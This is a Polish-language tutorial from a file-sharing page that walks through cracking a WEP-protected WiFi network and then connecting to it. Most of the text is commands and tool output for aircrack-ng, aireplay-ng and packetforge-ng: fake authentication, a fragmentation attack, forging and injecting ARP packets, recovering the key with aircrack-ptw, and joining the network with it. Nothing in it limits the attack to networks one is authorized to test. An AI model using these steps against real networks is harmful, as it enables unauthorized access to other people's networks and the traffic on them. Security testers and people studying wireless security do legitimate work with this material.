Ataki na sieci WiFi nr 1.txt

(10 KB) Pobierz
Ataki na sieci WiFi nr 1

Streszczenie:
1. Zbieranie informacji potrzebnych do ataku.
2. Przygotowywanie karty w tryb monitor i odpowiedni kanal.
3. Przeprowadzamy atak Fake Authentication.
4. Przeprowadzamy atak Fragmentation.
5. Tworzymy pakiet ARP.
6. Uruchamiamy airodump-ng
7. Injectujemy pakiet ARP.
8. Uruchamiamy aircrack-ng lub aircrack-ptw.
9. Laczymy sie z siecia

1. Zbieranie informacji potrzebnych do ataku.

Najbardziej fajnym sposobem ktorym znam jest uzycie iwlist. Ten program pokaze nam kanal, adres MAC
Access Point'a, tryb, kanal, czy wlaczone jest szyfrowanie oraz jakosc sygnalu. W tym celu wpisujemy
nastepujace polecenia:
Kod
ifconfig ra0 up
Kod
iwlist ra0 scan

Naszym oczom ukazuje sie:

Kod
ra0 Scan completed : 

Cell 01 - Address: 00:14:BF:E1:D3:DD 
ESSID:"test" 
Mode:Managed 
Channel:11 
Encryption key:on 
Quality:0/100 Signal level:-27 dBm Noise level:-256 dBm

Teraz wiemy wystaczajaco duzo aby przystapic do punku 2.


2. Przygotowywanie karty w tryb monitor i odpowiedni kanal.

Do trybu monitor mamy do wyboru uzyc airmon-ng lub iwconfig. Ja osobicie uzywam iwconfig lecz oba daja
nam ten sam efekt. W przypadku airmong-ng bedzie to:

Kod
airmon-ng start ra0 11

Gdzie: start znaczy uruchom tryb monitor dla karty o interfejsie ra0 na kanale 11. System odpowie:

Kod
Interface Chipset Driver 
ra0 Ralink rt61 (monitor mode enabled)

W przypadku iwconfig bedzie to:

Kod
iwconfig ra0 mode Monitor channel 11

Gdzie ra0 to interfejs mode to tryb Monitor na kanale 11-tym.

3. Przeprowadzamy atak Fake Authentication.

Ukryty tekst

Aby Access Point zaakceptowal pakiet ARP zrodlowy MAC musi byc polaczony z AP. W innym razie AP nie
bedzie odpowiadal. W tym celu wpisujemy nastepujace polecenie:

Kod
aireplay-ng -1 0 -e test -a 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA ra0

Jesli system odpowie:

Kod
13:57:55 Sending Authentication Request 
13:37:55 Authentication successful 
13:37:55 Sending Association Request 
13:37:55 Association successful :-)

Bingo! oto wlasnie chodzilo. Jesli otrzymalismy taki wynik przechodzimy do punku 4-go. Jesli dostajemy taka odpowiedz:

Kod
13:59:50 Sending Authentication Request 
13:59:52 Sending Authentication Request 
13:59:54 Sending Authentication Request 
13:59:56 Sending Authentication Request 
13:59:58 Sending Authentication Request 
14:00:00 Sending Authentication Request 
14:00:02 Sending Authentication Request 

Attack was unsuccessful. Possible reasons: 

* Perhaps MAC address filtering is enabled. 
* Check that the BSSID (-a option) is correct. 
* Try to change the number of packets (-o option). 
* The driver hasn't been patched for injection. 
* This attack sometimes fails against some APs. 
* The card is not on the same channel as the AP. 
* Injection is not supported AT ALL on HermesI, 
Centrino, ndiswrapper and a few others chipsets. 
* You're too far from the AP. Get closer, or lower 
the transmit rate (iwconfig <iface> rate 1M).

Jest to nieudany atak. Upewnij sie ze atak jest wystarczajaco mocny i zmien rate trasmitowania karty poleceniem:

Kod
iwconfig ra0 rate 1M

I wykonaj atak ponownie.

4. Przeprowadzamy atak Fragmentation.

Abysmy mogli przystapic do tego ataku atak nr. 3 MUSI sie udac. Atak Fragmentation nie tworzy nam pakietu ARP lecz uzywamy ten atak aby w nastepnym ataku bylo to mozliwe. Wklepujemy nastepujace polecenie:

Kod
aireplay-ng -5 -b 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA ra0

Gdzie opcja -5 to fragmentation attack, -b to mac Access Point'a, -h to nasz adres MAC, ra0 to interfejs karty. Po kilku sekundach system odpowie:

Kod
Waiting for a data packet... 
Read 337 packets... 

Size: 344, FromDS: 1, ToDS: 0 (WEP) 

BSSID = 00:14:BF:E1:D3:DD 
Dest. MAC = 01:00:5E:7F:FF:FA 
Source MAC = 00:14:BF:E1:D3:DB 

0x0000: 0862 0000 0100 5e7f fffa 0014 bfe1 d3dd .b....^........ 
0x0010: 0014 bfe1 d3db 5044 058b 9500 4b85 b8e6 ......PD....K... 
0x0020: 366d 66c7 3480 33a3 bccc 84ea 59a5 9ceb 6mf.4.3.....Y... 
0x0030: 70f0 f095 4834 0821 18a8 d626 3038 6955 p...H4.!...&08iU 
0x0040: 28fb 6fc6 d1ba 69bb aaf0 bc4d 5fda 8e48 (.o...i....M_..H 
0x0050: 58c4 ab90 01f0 4bd8 d7b3 6ea2 495b 5b36 X.....K...n.I[[6 
0x0060: 6f45 dab2 f9b4 4831 8e00 98b8 365e afd7 oE....H1....6^.. 
0x0070: 1284 fa9e 5740 3750 6662 c9d9 d9d7 a8d1 ....W@7Pfb...... 
0x0080: 0789 8d50 6473 566f 9a8f eeb6 7161 581e ...PdsVo....qaX. 
0x0090: 1136 306b 5c02 b838 b119 3c48 9c8c 0fa6 .60k\..8..<H.... 
0x00a0: 7fb0 9724 f1f7 94e1 63a6 3447 29a5 1f07 ..$....c.4G)... 
0x00b0: 6f36 fdf1 e860 2459 3bdb 3748 4396 e8ab o6...`$Y;.7HC... 
0x00c0: 673c cd84 2b64 2233 2bbf 47df 3d1b b863 g<..+d"3+.G.=..c 
0x00d0: 564c efd2 0e8e 97bf c68b d461 1c14 a288 VL.........a.... 
--- CUT --- 

Use this packet ?

Stanowczo odpowiadamy Y. Nastepnie system nam odpowie:

Kod
Saving chosen packet in replay_src-0427-141120.cap 
Data packet found! 
Sending fragmented packet 
Got RELAYED packet!! 
Thats our ARP packet! 
Trying to get 384 bytes of a keystream 
Got RELAYED packet!! 
Thats our ARP packet! 
Trying to get 1500 bytes of a keystream 
Got RELAYED packet!! 
Thats our ARP packet! 
Saving keystream in fragment-0427-141145.xor 
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Yeah! Przechodzimy do nastepnego punku.

5. Tworzymy pakiet ARP.

Bez zbednego bla bla bla wpisujemy polecenie:

Kod
packetforge-ng -0 -a 00:14:BF:E1:D3:DD -h 00:17:9A:B2:31:AA -k 255.255.255.255 -l 255.255.255.255 -y fragment-0427-141145.xor -w sexowny-pakiet-arp

Gdzie -0 mowimy programowi ze chcemy pakiet ARP, -a to MAC Access Point'a, -h to nasz adres MAC, -l to zrodlo, -k to cel, -y to plik ktory zostal wygenerowany w poprzednim ataku, -w to nazwa pliku w ktory program ma zapisac nasz pakiet ARP. Z doswiadczenia wiem ze te ustawiania dzialaja zawsze. System odpowie:

Kod
Wrote packet to: sexowny-pakiet-arp

Brawo, wlasnie stworzylismy pakiet ARP i przestepujemy do nastepnego punktu.

6. Uruchamiamy airodump-ng

Uruchamiamy konsole i wpisujemy nastepujace polecenie:

Kod
airodump-ng -w tocrack -c 11 --bssid 00:14:BF:E1:D3:DD ra0
aireplay-ng -2 -r sexowny-pakiet-arp -x 666 ra0

Gdzie -2 to injectowanie indywidualnie wybranego pakietu -r sexowny-pakiet-arp to nazwa nasz pakiet ARP, -x 666 to ilosc pakietow ktore zostana wyslane (w sekundach). System odpowie:

Kod
Size: 68, FromDS: 0, ToDS: 1 (WEP) 

BSSID = 00:14:BF:E1:D3:DD 
Dest. MAC = FF:FF:FF:FF:FF:FF 
Source MAC = 00:17:9A:B2:31:AA 

0x0000: 0841 0201 0014 bfe1 d3dd 0017 9ab2 31aa .A............1. 
0x0010: ffff ffff ffff 8001 128b 9500 0d51 313f .............Q1? 
0x0020: bc5f fa9c d755 50ab 5246 1e83 9172 f4b1 ._...UP.RF...r.. 
0x0030: 3522 dd56 6e5f 90a9 9275 fe6c 5d84 dcea 5".Vn_...u.l]... 
0x0040: 402e e7fa @... 

Use this packet ?

Jak widac wielkosc naszego pakietu to 68 bitow jest to tradycyjna wielkosc pakietu ARP, BSSID to adres MAC Acess Point'a, Dest. MAC to adres docelowy jak widac jest to adres MAC broadcast'u (255.255.255.255), Source MAC to zrodlo czyli my ;).
Stanowczo odpowiadamy Y nastepnie program zacznie wysylac pakiet a airodump-ng "zlapie" odpowiedzi ktore wysle nam Acess Point. Przechodzimy do nastepnego punktu.

8. Uruchamiamy aircrack-ng lub aircrack-ptw.

W dawnej wersji WEP klucze mialy 64 bity dzis WEP2 ma 128 a tak naprawde jest to 104 bity. Program aircrack-ptw jest nowoscia musimy go samodzielnie zainstalowac samodzielnie. Mozemy go pobrac ze strony [ www ] Przystepujemy do instalacji. Pierw musimy go rozpakowac poleceniem:

Kod
tar -zxvf aircrack-ptw-1.0.0.tar.gz

Nastepnie:

Kod
cd aircrack-ptw-1.0.0 && make
emerge aircrack-ptw

Dla tych co uzywaja aircrack-ng musza zaczekac znacznie wiecej aby zlamac klucz dla tych co uzywaja aircrack-ptw caly proces w bardzo krotszy. Pierw opisze uzycie programu aircrack-ptw:

Kod
aircrack-ptw tocrack-01.cap

Gdzie tocrack-01.cap to jest nazwa pliku ktora stworzyl nam program airodump-ng. Jesli mamy wystarczajaco pakietow program zlamie klucz odpowiadajac:

Kod
This is aircrack-ptw 1.0.0 
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ 
allocating a new table 
bssid = 00:14:BF:E1:D3:DD keyindex=0 
stats for bssid 00:14:BF:E1:D3:DD keyindex=0 packets=115771 
Found key with len 13: 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D 70

Bingo, zlamalismy klucz. Dla tych co uzywaja aircrack-ng musza zebrac 250.000 pakietow IV aby zlamac 64 bitowy klucz oraz milion czasami wiecej aby zlamac 128 bitowy klucz. W tym celu wpisujemy:

Kod
aircrack-ng -0 tocrack-01.cap

Dzieki opcji -X bedziemy mieli kolorki jak w matrixie, tocrack-01.cap to nazwa pliku z pakietami. Jesli wszystko pujdzie OK program zlamie klucz i wyswietli go nam na ekranie krzyczac:

Kod
KEY FOUND! [ 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D ]

Jesli wydobycie klucza sie nie zakonczy jakbysmy tego chcieli mozemy dodac parametrk -f x. Gdzie x jest liczba:

Kod
aircrack-ng -X -f 15 tocrack-01.cap

Z doswiadczenia wiem ze 15 jest najlepszym wyjsciem. Ale nie jest to regula. Nastepnie...

9. Laczymy sie z siecia

Po zlamaniu klucza kazdy bedzie chcial polaczyc sie z siecia. Aby to zrobic musimy:
Wylaczyc karte:

Kod
ifconfig ra0 down

Nastepnie ustawic nazwe sieci, ustawic tryb, podac klucz oraz kanal poleceniem:

Kod
iwconfig ra0 mode Managed key 35 80 8D 60 FA 9D 08 7D F7 65 DA 1D essid test channel 11

Teraz mozemy uzyc dhcpcd lub pump. Dla dhcpcd bedzie to:

Kod
dhcpcd ra0

Dla pump bedzie to:

Kod
pump -i ra0

Chyba nie musze tlumaczyc co jest do czego. Jesli system nie odpowie nam zadnym komunikatem bledu znaczy ze wszystko jest OK i mozemy przetestowac polaczenie:

Kod
ping -c 3 www.google.com

System odpowie:

Kod
PING www.l.google.com (64.233.183.147) 56(84) bytes of data. 
64 bytes from nf-in...
Zgłoś jeśli naruszono regulamin